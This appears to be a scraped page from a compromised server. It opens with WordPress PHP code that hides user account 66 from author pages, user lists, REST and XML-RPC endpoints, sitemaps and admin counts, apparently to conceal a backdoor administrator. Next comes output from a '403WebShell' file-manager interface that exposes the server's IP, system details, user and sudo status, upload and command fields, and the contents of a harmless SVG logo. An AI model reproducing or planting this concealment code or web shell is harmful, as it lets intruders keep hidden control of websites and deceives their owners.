add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/public/images/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/jungly/public/images/logo.svg
<?xml version="1.0" encoding="UTF-8"?>
<svg width="87px" height="33px" viewBox="0 0 87 33" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <!-- Generator: Sketch 51.3 (57544) - http://www.bohemiancoding.com/sketch -->
    <title>logo</title>
    <desc>Created with Sketch.</desc>
    <defs></defs>
    <g id="logo" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
        <path d="M0,30.44 C0,29.906664 0.14933184,29.4746683 0.448,29.144 C0.74666816,28.8133317 1.11999776,28.648 1.568,28.648 C2.101336,28.648 2.4479992,28.4346688 2.608,28.008 C2.7680008,27.5813312 2.848,26.9413376 2.848,26.088 L2.848,11.144 C2.848,10.7599981 3.03999808,10.4506678 3.424,10.216 C3.80800192,9.98133216 4.28799712,9.864 4.864,9.864 C5.46133632,9.864 5.96266464,9.98133216 6.368,10.216 C6.77333536,10.4506678 6.976,10.7599981 6.976,11.144 L6.976,26.088 C6.976,27.9226758 6.56000416,29.3893278 5.728,30.488 C4.89599584,31.5866722 3.70134112,32.136 2.144,32.136 C0.71465952,32.136 0,31.5706723 0,30.44 Z M2.624,4.456 C2.624,3.90133056 2.84266448,3.42666864 3.28,3.032 C3.71733552,2.63733136 4.2559968,2.44 4.896,2.44 C5.51466976,2.44 6.04266448,2.63733136 6.48,3.032 C6.91733552,3.42666864 7.136,3.90133056 7.136,4.456 C7.136,4.989336 6.91733552,5.45866464 6.48,5.864 C6.04266448,6.26933536 5.51466976,6.472 4.896,6.472 C4.2559968,6.472 3.71733552,6.26933536 3.28,5.864 C2.84266448,5.45866464 2.624,4.989336 2.624,4.456 Z M10.048,18.856 L10.048,11.176 C10.048,10.8559984 10.2559979,10.5573347 10.672,10.28 C11.0880021,10.0026653 11.5733306,9.864 12.128,9.864 C12.661336,9.864 13.1359979,10.0026653 13.552,10.28 C13.9680021,10.5573347 14.176,10.8559984 14.176,11.176 L14.176,18.856 C14.176,19.6026704 14.4533306,20.2693304 15.008,20.856 C15.5626694,21.4426696 16.2239962,21.736 16.992,21.736 C17.7600038,21.736 18.4159973,21.4426696 18.96,20.856 C19.5040027,20.2693304 19.776,19.6026704 19.776,18.856 L19.776,11.144 C19.776,10.802665 19.9839979,10.5040013 20.4,10.248 C20.8160021,9.99199872 21.3013306,9.864 21.856,9.864 C22.4533363,9.864 22.9439981,9.99199872 23.328,10.248 C23.7120019,10.5040013 23.904,10.802665 23.904,11.144 L23.904,18.856 C23.904,20.5840086 23.2213402,22.0986602 21.856,23.4 C20.4906598,24.7013398 18.8693427,25.352 16.992,25.352 C15.1146573,25.352 13.4880069,24.7013398 12.112,23.4 C10.7359931,22.0986602 10.048,20.5840086 10.048,18.856 Z M26.976,23.752 L26.976,11.144 C26.976,10.7599981 27.1626648,10.4506678 27.536,10.216 C27.9093352,9.98133216 28.4053302,9.864 29.024,9.864 C29.5360026,9.864 29.9679982,9.98133216 30.32,10.216 C30.6720018,10.4506678 30.848,10.7599981 30.848,11.144 L30.848,12.104 C31.189335,11.4213299 31.7386629,10.8453357 32.496,10.376 C33.2533371,9.90666432 34.1333283,9.672 35.136,9.672 C36.6080074,9.672 37.8933278,10.3119936 38.992,11.592 C40.0906722,12.8720064 40.64,14.3973245 40.64,16.168 L40.64,23.752 C40.64,24.1573354 40.4320021,24.4773322 40.016,24.712 C39.5999979,24.9466678 39.1146694,25.064 38.56,25.064 C38.026664,25.064 37.5520021,24.9466678 37.136,24.712 C36.7199979,24.4773322 36.512,24.1573354 36.512,23.752 L36.512,16.168 C36.512,15.4213296 36.2346694,14.7546696 35.68,14.168 C35.1253306,13.5813304 34.4746704,13.288 33.728,13.288 C33.0239965,13.288 32.4106693,13.554664 31.888,14.088 C31.3653307,14.621336 31.104,15.3146624 31.104,16.168 L31.104,23.752 C31.104,24.0720016 30.8960021,24.3706653 30.48,24.648 C30.0639979,24.9253347 29.5786694,25.064 29.024,25.064 C28.4479971,25.064 27.9626686,24.930668 27.568,24.664 C27.1733314,24.397332 26.976,24.093335 26.976,23.752 Z M42.592,27.624 C42.592,26.1519926 43.3706589,25.0213373 44.928,24.232 C44.0319955,23.8053312 43.584,23.1226714 43.584,22.184 C43.584,21.2453286 44.1279946,20.413337 45.216,19.688 C43.8933267,18.6639949 43.232,17.3093418 43.232,15.624 L43.232,14.952 C43.232,13.3946589 43.8079942,12.1253382 44.96,11.144 C46.1120058,10.1626618 47.6159907,9.672 49.472,9.672 C50.880007,9.672 52.0959949,9.98133024 53.12,10.6 C53.7600032,9.14932608 54.4106634,8.424 55.072,8.424 C55.5626691,8.424 55.9573318,8.56266528 56.256,8.84 C56.5546682,9.11733472 56.704,9.40533184 56.704,9.704 C56.704,10.045335 56.533335,10.3439987 56.192,10.6 C55.4026627,11.1546694 54.9013344,11.5599987 54.688,11.816 C55.4346704,12.690671 55.808,13.7359939 55.808,14.952 L55.808,15.624 C55.808,17.1600077 55.2160059,18.4346616 54.032,19.448 C52.8479941,20.4613384 51.3280093,20.968 49.472,20.968 C48.7039962,20.968 48.0106698,20.872001 47.392,20.68 C47.1359987,20.8933344 47.008,21.1066656 47.008,21.32 C47.008,21.6826685 47.3386634,21.9493325 48,22.12 C48.6613366,22.2906675 49.4666619,22.4346661 50.416,22.552 C51.3653381,22.6693339 52.3093286,22.8399989 53.248,23.064 C54.1866714,23.2880011 54.9866634,23.7413299 55.648,24.424 C56.3093366,25.1066701 56.64,26.0026611 56.64,27.112 C56.64,28.7760083 55.9680067,30.0293291 54.624,30.872 C53.2799933,31.7146709 51.6266765,32.136 49.664,32.136 C47.6799901,32.136 46.0053402,31.7306707 44.64,30.92 C43.2746598,30.1093293 42.592,29.0106736 42.592,27.624 Z M46.496,27.208 C46.496,27.9120035 46.7946637,28.4666646 47.392,28.872 C47.9893363,29.2773354 48.725329,29.48 49.6,29.48 C50.474671,29.48 51.1999971,29.2773354 51.776,28.872 C52.3520029,28.4666646 52.64,27.9226701 52.64,27.24 C52.64,26.9413318 52.5866672,26.6800011 52.48,26.456 C52.3733328,26.2319989 52.186668,26.0453341 51.92,25.896 C51.653332,25.7466659 51.4186677,25.6240005 51.216,25.528 C51.0133323,25.4319995 50.6880022,25.346667 50.24,25.272 C49.7919978,25.197333 49.4666677,25.1493334 49.264,25.128 C49.0613323,25.1066666 48.7146691,25.0640003 48.224,25 C47.0719942,25.533336 46.496,26.2693286 46.496,27.208 Z M47.232,15.592 C47.232,16.4240042 47.4346646,17.1119973 47.84,17.656 C48.2453354,18.2000027 48.810663,18.472 49.536,18.472 C50.2400035,18.472 50.7946646,18.2106693 51.2,17.688 C51.6053354,17.1653307 51.808,16.4773376 51.808,15.624 L51.808,14.952 C51.808,14.1626627 51.6000021,13.501336 51.184,12.968 C50.7679979,12.434664 50.2080035,12.168 49.504,12.168 C48.7999965,12.168 48.2453354,12.4293307 47.84,12.952 C47.4346646,13.4746693 47.232,14.1413293 47.232,14.952 L47.232,15.592 Z M58.048,23.08 C58.048,22.4826637 58.2559979,21.9706688 58.672,21.544 C59.0880021,21.1173312 59.6053302,20.904 60.224,20.904 C60.8000029,20.904 61.3013312,21.1173312 61.728,21.544 C62.1546688,21.9706688 62.368,22.4826637 62.368,23.08 C62.368,23.6560029 62.1546688,24.1626645 61.728,24.6 C61.3013312,25.0373355 60.8000029,25.256 60.224,25.256 C59.6053302,25.256 59.0880021,25.0426688 58.672,24.616 C58.2559979,24.1893312 58.048,23.6773363 58.048,23.08 Z M65.152,23.752 L65.152,2.28 C65.152,1.89599808 65.3386648,1.58666784 65.712,1.352 C66.0853352,1.11733216 66.5813302,1 67.2,1 C67.7760029,1 68.2666646,1.11733216 68.672,1.352 C69.0773354,1.58666784 69.28,1.89599808 69.28,2.28 L69.28,23.752 C69.28,24.0720016 69.0720021,24.3706653 68.656,24.648 C68.2399979,24.9253347 67.7546694,25.064 67.2,25.064 C66.6239971,25.064 66.1386686,24.930668 65.744,24.664 C65.3493314,24.397332 65.152,24.093335 65.152,23.752 Z M71.36,30.376 C71.36,29.2239942 71.7119965,28.648 72.416,28.648 C73.4186717,28.648 74.4053285,28.285337 75.376,27.56 C76.3466715,26.834663 76.8853328,25.6293418 76.992,23.944 L71.488,12.168 C71.4026662,11.9546656 71.36,11.7733341 71.36,11.624 C71.36,11.1119974 71.6746635,10.6533354 72.304,10.248 C72.9333365,9.84266464 73.5359971,9.64 74.112,9.64 C74.7520032,9.64 75.1466659,9.87466432 75.296,10.344 L79.136,19.912 L82.24,10.344 C82.3893341,9.87466432 82.7519971,9.64 83.328,9.64 C83.8826694,9.64 84.4906634,9.84799792 85.152,10.264 C85.8133366,10.6800021 86.144,11.154664 86.144,11.688 C86.144,11.8586675 86.1120003,12.0186659 86.048,12.168 L81.376,24.104 L80.832,25.512 C80.5759987,26.237337 80.3893339,26.7386653 80.272,27.016 C80.1546661,27.2933347 79.9520014,27.7253304 79.664,28.312 C79.3759986,28.8986696 79.1200011,29.325332 78.896,29.592 C78.6719989,29.858668 78.3573354,30.1893314 77.952,30.584 C77.5466646,30.9786686 77.1360021,31.2666658 76.72,31.448 C76.3039979,31.6293342 75.7973363,31.7893326 75.2,31.928 C74.6026637,32.0666674 73.9520035,32.136 73.248,32.136 C72.6293302,32.136 72.1600016,32.0186678 71.84,31.784 C71.5199984,31.5493322 71.36,31.0800035 71.36,30.376 Z" id="jung.ly" fill="#72DF1C"></path>
    </g>
</svg>

Youez - 2016 - github.com/yon3zu
LinuXploit